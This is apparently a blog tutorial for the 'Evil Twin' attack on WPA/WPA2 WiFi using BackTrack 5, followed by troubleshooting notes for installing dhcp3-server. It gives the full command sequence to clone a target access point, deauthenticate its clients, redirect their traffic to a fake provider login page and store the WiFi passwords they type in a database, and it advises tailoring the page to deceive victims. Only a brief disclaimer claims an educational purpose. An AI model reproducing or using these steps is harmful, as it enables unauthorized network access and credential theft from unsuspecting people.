Вы находитесь на странице: 1из 7

reading this you agree: That hacking cracking WiFi or Wireless network

password is illegal and everything you're about to learn here is for


education purposes only and should not be used for any illegal or criminal
activities as I will not be responsible for any trouble you may get into by
hacking public WiFi or Wireless networks! My intentions here is to show you
how vulnerable WiFi network security really is so YOU can better protect
yourself form WiFi network hacks. All the hacking and cracking was done
using my own router.


BackTrack hack wpa2 and wpa password!
Hacking WPA Key Evil Twin method!
All right so lets continue cracking WPA and WPA2 password! So the another
method you can use to hack WiFi network password when other methods
have failed is called EVIL TWIN method!
Hacking WPA Key Evil Twin method allows you to clone the target network
and then redirect a connected client to the fake access point where a client
will be prompt to enter the correct WiFi network password which will be
stored in our database!
So lets get cracking!
First thing first you need to install dhcp3-server that will store entered keys
in mysql database and will display out fake web-page using apache2!
Type:
apt-get install dhcp3-server -y
If you get some kind of error please check:
Install dhcp3-server BackTrack 5
Once you have dhcp3-server installed lets edit "dhcpd.conf" file that we
need for this attack to work, however first lets backup the original one.
Type:
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
Now lets edit dhcpd.conf file.
Type:
gedit /etc/dhcp3/dhcpd.conf
It should open an empty file, now copy and paste into this file.
Type:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
Ok now go-ahead and press save!
Now lets create our database! Go
to Applications>BackTrack>Services>MySQLD>mysqld start. A new terminal
window should pup-up saying starting mysqld! Don't close it, it will close
itself!
Lets create database:
Type:
mysql -u root -p
It will ask you for the password which is toor
Type:
create database wpa2;
Type:
use wpa2;
Type:
create table content(key1 VARCHAR(64), key2 VARCHAR(64));
If you get some kind of error please check:
Install dhcp3-server BackTrack 5
Now go to: Applications>BackTrack>Services>MySQLD>mysqld stop. Again don't
close it, it will close itself!
So now we need a fake web-page that will ask for the WiFi password!
Download Hacking File!
All right place the content of the verizon folder here:
/var/www/
NOTICE: For you to have a better chance to make it work I recommend to
customize verizon web-page to something that will make it more credible
for the client you know is like when you live in China it is better to change
all the text to Chainise instead of English! Or for instance if you know the
client's internet provider then include somthing with the name of the client's
internet provider which will make a client to believe that it is a real thing!
Ok, now lets begin creating a fake access point!
First lets make a quick scan and locate the network we want to clone!
Type:
airodump-ng mon0
Once you have located your target network press Ctrl+C.
Now lets clone the network, you will need the network's, ESSID, BSSID,
CHANNEL!
Type:
airbase-ng -e "ESSID" -c CHANNEL -a BSSID mon0
NOTICE: Make sure you use the identical data or it will not work!
NOTICE: Don't close this terminal during attack! It will display important
information!
Now, open up a new terminal.
Type:
ifconfig at0 up
Type:
ifconfig at0 192.168.2.129 netmask 255.255.255.128
Type:
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
Type:
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
Type:
/etc/init.d/dhcp3-server start
NOTICE: When you run this line /etc/init.d/dhcp3-server start you
should see OK!
Lets flash IP tables.
Type:
iptables -flush
Type:
iptables --table nat -flush
Type:
iptables -delete-chain
Type:
iptables --table nat -delete-chain
Type:
iptables --table nat --append POSTROUTING --out-interface wlan0 -j
MASQUERADE
Type:
iptables --append FORWARD --in-interface at0 -j ACCEPT
Type:
echo 1 > /proc/sys/net/ipv4/ip_forward
So far so good! Now lets start mysql and apache2!
Go to:
Applications>BackTrack>Services>MySQLD>mysqld start.
Applications>BackTrack>Services>HTTPD>httpd start.
NOTICE: Don't close pup up terminals they will close themselves!
Now lets redirect all the traffic to our fake web-page.
Type:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination
000.000.00.000:80
Type:
iptables -t nat -A POSTROUTING -j MASQUERADE
NOTICE: "--to-destination 000.000.00.000:80" that is my IP address check
yours. You have to be connected to the internet by wired connection!
Now lets check if our fake web page is working! Open up web browser and
type "000.000.00.000:80" it should show the fake web page!
Now lets check our target network for any clients!
Type:
airodump-ng bssid here -c here mon0
Once you locate a client lest redirect it to our fake page so it can enter the
password!
Type:
aireplay-ng -0 0 -a "BSSID" -c here mon0
NOTICE: Let this code above to run don't close it!
Now go back to airbase-ng -e "ESSID" -c CHANNEL -a BSSID mon0 terminal
and check the progress it should begin showing that the client is trying to
associate with a secured network, you will know that because it will show
WPA2 encrypted! What we are looking for is for the client to associate with
unsecured network which is our fake one! Once you see that, lets check if
the client has entered the password! Open up a new terminal.
Type:
mysql -u root -p
password is toor
Type:
use wpa2;
Type:
select * from content;
Two columns will appear KEY1 and KEY2 if they are empty then well
continue waiting but if they have something entered then it may be a WiFi
password, try it and if it works then congratulations.
Thanks have fun!



Thanks for visiting my blog!
Hack wifi with backtrack 5.
How to install dhcp3-server Backtrack 5
BACKTRACK 5 is the ultimate tool for the hackers however for us that just
trying to imitate those big boys it is a bit of pain when it comes to ERRORS!
So in this topic I will teach you how to fix some problems with DHCP3-
SERVER for BACKTRACK 5!
All right so dhcp3-server is a must have tool if you are serious about
hacking and cracking! Mainly dhcp3server is used for creating:
1. Fake access point
2. Fake access point evil twin method
and many more!
However dhcp3server doesn't come with BACKTRACK 5 you need to install it
and here is where errors begin! So lets fix them!
Firs is first lets install dhcp3server:
Type:
apt-get install dhcp3-server -y
if you get no errors here then congratulations, however most of us get this
error: E: Broken packages.
So let me show you how to fix it! Open up a new terminal and type:
apt-get install synaptic
Wait for that to install and then go to System>Administration>Synaptic
Package Manager and click on it! Then in the quick search bar type:
dhcp3-common
Click on it and go to Package menu at the top, select Force Version In
the drop-down menu, select 3.1.3-2ubuntu3.2 (stable) then click force
version and then Mark, then press the Apply button with the green
check-mark! This action will uninstall dhcp3-common, dhcp3-gtk, dhcp3-
daemon, and also Wicd. Since Wicd is important for starting and stopping
networking lets go-ahead and install it!
Type:
apt-get install wicd
Now here, if you don't get error then again congratulations, however if you
get this error: E: Broken packages, then go to
System>Administration>Synaptic Package Manager and click on it! Then in
the quick search bar type:
wicd
You shoud see:
wicd
wicd-daemon
Select them right click and select Mark for Complete Removal then click
Apply! It should uninstall those files!
Now select:
wicd
wicd-daemon
right click and select Mark for Installation then press Apply button! It
should begin downloading 5 files! Let it finish! Now go to
Applications>Internet>WICD Network Manager should be visible!
Now open up a new terminal and type:
apt-get install dhcp3-server -y
That should install dhcp3server!
So this is pretty much how to install dhcp3server! However this isn't the
end of the story! Even though you have just installed dhcp3server will still
cause some troubles, like this one! When you want to create database in
mysql, again if you get no error you're good but I bet you will, so the error
looks like this:
error code 1064 sqlstate 42000 you have an error in your sql syntax.
So lets fix this one too! For that you will need two files:
dhcp3-server and dhcp3-common.
Download dhcp3-server and Download dhcp3-
common
They are dhcp3server but more stable! Now you need to uninstall your
dhcp3server!
Type:
apt-get purge dhcp3-server
Wait for it to finish and then type:
apt-get purge dhcp3-common
Again wait for it to finish! Cool! Now lets install the new dhcp3server! First
install this one:
dpkg -i dhcp3-common(whatever the file name is).deb
After it has been installed install this one:
dpkg -i dhcp3-server(whatever the file name is).deb
Now lets fix this the error you get when trying to connect to MYSQL
database!
The error you get is this:
ERROR 2002 (HY000): Can't connect to local MySQL server through socket
'/var/run/mysqld/mysqld.sock' (2)
So to fix it open-up a new terminal and type:
mkdir /var/run/mysqld
Type:
touch /var/run/mysqld/mysqld.sock
Type:
ls -lart /var/run/mysqld
Type:
chown -R mysql /var/run/mysqld
Type:
ls -lart /var/run/mysqld
Type:
/etc/init.d/mysql restart
Now you have a working dhcp3server!
Have fun!

Вам также может понравиться